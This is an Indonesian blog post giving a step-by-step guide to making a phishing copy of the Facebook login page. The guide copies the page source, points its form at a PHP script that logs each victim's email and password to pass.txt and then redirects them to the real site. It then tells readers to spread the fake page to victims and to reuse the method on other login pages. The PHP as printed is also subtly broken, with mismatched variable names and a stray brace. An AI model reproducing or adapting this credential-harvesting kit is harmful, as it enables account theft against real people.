Sabtu, 17 November 2012

Cara Membuat Web Site Palsu (Phising)


  Kon'nichwa Mina San............. Sobat-Sobat Adin-WEB, Jumpa lagi dengan Ane Admin-Mr.Potensial Baik-baik aja ya ?............ Gk kerasa, udah 2 minggu lebih ngak ngepost lagi akibat ane sibuk-sibuk nyiapkan Buat Skolah di Bandung. Ya, begitulah kalau mau masuk sekolah baru, pastinya repot-repot pertamanya..... Ya sudah, kita balik lagi ke topik utama. Nh, Pada kesempatan kali ini, Ane akan memberikan sebuah ilmu hacker. ketika Ane sedang Bersemedi (Emangnya Orang Sakti ?.....) di Gramedia Bandung, Ane menemukan sebuah buku yang menurut Ane Cakep banget. Nama bukunya yaitu Buku Sakti Hacker. Ane beli deh Bukunya dengan harga 75Rb plus dengan Kaset Softwarenya. Lalu ane Baca-baca ane nemuin Bab yang membahas Tentang Phising (Bukan Fishing). Nh itu lah yang akan ane Bagi-Bagi pada Posting Kali ini. Mau Tahu caranya ?..... ini dia caranya :

1. Kita ambil contoh membuat Phising Facebook. pertama buka www.facebook.com/login.php.



2. Lalu Kalian Klik Kanan, pilih View Page Source, Seperti inilah Tampilan nya. (Google Chorme)




3. Setelah itu Copykan Semua Script ke Notepad.


4. Cari kode Kata action= untuk di ganti.



5. Ketika nanti Kalian klik Find pada Notepadnya, nanti kalian akan menemukan     action="https://login.facebook.com/login.php", Lalu, ubahlah menjadi action="secret.php" dan ubahlah juga methode dari "POST" Menjadi "GET" .



6. Lalu, Simpan file tersebut dengan nama index.php . Supaya menjadi File PHP bukan TXT, dalam kotak dialog save as type, ganti menjadi All Files.


7. Sekarang buat Notepad yang baru lagi. kemudian isiskan Script berikut ini :


<?php
header("location: http://www.facebook.com/login.php ");
$handler = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "_");
fwrite($handle, $value);
fwrite($handle, "\r\n");
{
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

8. Kemudian Simpan dengan nama file secret.php

9. Buka Notepad baru lagi. kemudian biarkan isinya kosong, dan simpan dengan nama pass.txt Fungsi file ini untuk menyimpan Email dan password facebook korban.

10. Terakhir Upload ketiga file tersebut (index.php , secret.php , dan pass.txt) ke dalam website hosting Sobat.

11. Sekarang kalian mempunyai halaman phising Facebook.

  Sekarang tugas sobat-sobat yaitu untuk menyebarkan Website palsu yang telah Sobat buat tadi supaya ada yang mengaksesnya. Cara phising seperti ini tidak akan merubah tampilan Login Facebook. Tampilan Facebooknya pastinya akan 100% sama seperti yang aslinya. ini contoh phising Facebook buatan ane.


    Nanti sewaktu ada seseorang yang membuka halaman facebook palsu yang telah kalian buat, password dan Email korban tersebut akan terkirim ke dalam file pass.txt yang telah kalian buat.

  Sobat juga dapat menerapkan cara yang sama untuk halaman-halaman yang menerapkan halaman login lainnya....
 
                             
                                                                                         Created:Mr.Adin ROXE

Tidak ada komentar:

Poskan Komentar